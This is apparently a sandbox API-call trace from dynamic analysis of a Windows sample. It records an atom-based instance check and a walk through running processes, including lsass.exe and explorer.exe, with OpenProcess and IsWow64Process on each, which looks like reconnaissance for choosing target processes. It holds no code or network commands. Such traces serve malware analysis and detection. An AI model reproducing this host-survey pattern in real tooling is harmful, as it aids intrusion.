	[0071.943] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.944] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0071.944] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.944] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.945] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetLastError () returned 0x5
	[0071.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.946] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0071.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.946] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0071.946] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0071.946] CloseHandle (hObject=0x224) returned 1
	[0071.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0071.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0071.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.947] CloseHandle (hObject=0x224) returned 1
	[0071.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb30, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0071.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0071.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0071.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.947] CloseHandle (hObject=0x224) returned 1
	[0071.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16b88) returned 0xc0000004
	[0071.983] VirtualAlloc (lpAddress=0x0, dwSize=0x16c88, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0071.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16c88, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0071.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0071.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0071.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0071.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0071.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0071.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0071.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0071.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0071.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0071.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0071.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0071.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0071.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0071.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0071.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0071.988] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.988] CloseHandle (hObject=0x224) returned 1
	[0071.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0071.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0071.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0071.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.989] CloseHandle (hObject=0x224) returned 1
	[0071.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a18, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0071.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0071.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0071.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.989] CloseHandle (hObject=0x224) returned 1
	[0071.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0071.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.989] CloseHandle (hObject=0x224) returned 1
	[0071.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0071.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.990] CloseHandle (hObject=0x224) returned 1
	[0071.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0071.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.990] CloseHandle (hObject=0x224) returned 1
	[0071.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728878, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0071.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.990] CloseHandle (hObject=0x224) returned 1
	[0071.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0071.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.990] CloseHandle (hObject=0x224) returned 1
	[0071.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0071.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0071.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.991] CloseHandle (hObject=0x224) returned 1
	[0071.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0071.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.991] CloseHandle (hObject=0x224) returned 1
	[0071.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0071.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.991] CloseHandle (hObject=0x224) returned 1
	[0071.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0071.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0071.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.992] CloseHandle (hObject=0x224) returned 1
	[0071.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0071.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.992] CloseHandle (hObject=0x224) returned 1
	[0071.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0071.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.992] CloseHandle (hObject=0x224) returned 1
	[0071.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728998, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0071.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0071.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.992] CloseHandle (hObject=0x224) returned 1
	[0071.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e6d0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0071.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0071.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.993] CloseHandle (hObject=0x224) returned 1
	[0071.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0071.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.993] CloseHandle (hObject=0x224) returned 1
	[0071.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0071.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.993] CloseHandle (hObject=0x224) returned 1
	[0071.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0071.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.993] CloseHandle (hObject=0x224) returned 1
	[0071.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
